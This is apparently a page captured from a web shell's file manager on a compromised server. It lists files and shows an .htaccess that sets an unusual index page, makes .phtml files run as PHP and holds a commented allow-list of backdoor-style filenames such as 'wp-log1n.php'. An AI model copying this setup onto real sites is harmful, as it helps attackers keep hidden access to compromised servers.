at path:ROOT / .htaccess
run:R W Run
DIR
2026-04-24 03:02:00
R W Run
DIR
2026-04-24 03:02:00
R W Run
DIR
2026-04-24 07:52:18
R W Run
799 By
2026-03-25 04:50:19
R W Run
4.44 KB
2026-02-14 07:09:54
R W Run
173.77 KB
2026-04-24 02:01:05
R W Run
122.65 KB
2026-04-24 03:02:35
R W Run
4.44 KB
2026-01-27 07:01:46
R W Run
16.37 KB
2026-04-24 07:52:17
R W Run
1.93 KB
2026-04-24 03:11:36
R W Run
4.44 KB
2026-02-06 07:38:34
R W Run
15.05 KB
2026-04-24 03:02:34
R W Run
308.59 KB
2026-04-24 02:01:05
R W Run
2.74 KB
2026-04-24 03:01:57
R W Run
12.21 KB
2026-02-24 06:54:32
R W Run
error_log
📄.htaccess
1
2RewriteEngine on
3
4Options +FollowSymlinks
5
6DirectoryIndex index-reforzado.php
7
8# <FilesMatch '^(goods.php|buy.php|special.php|click.php|edit.php|pages.php|product.php|shop.php|item.php|search.php|brand.php|wp-configs.php|install.php|plugin.php|plugins.php|admin.php|index.php|wp-login.php|wp-log1n.php|about.php|defaults.php|function.php|mah.php|networks.php|options.php)$'>
9# Order allow,deny
10# Allow from all
11# </FilesMatch>
12
13# php -- BEGIN cPanel-generated handler, do not edit
14# Set the “ea-php74” package as the default “PHP” programming language.
15<IfModule mime_module>
16 AddHandler application/x-httpd-php .php .php7 .phtml
17</IfModule>
18# php -- END cPanel-generated handler, do not edit
19
20RewriteCond %{REQUEST_FILENAME}.php -f
21RewriteRule !.*\.php$ %{REQUEST_FILENAME}.php [QSA,L]
22
23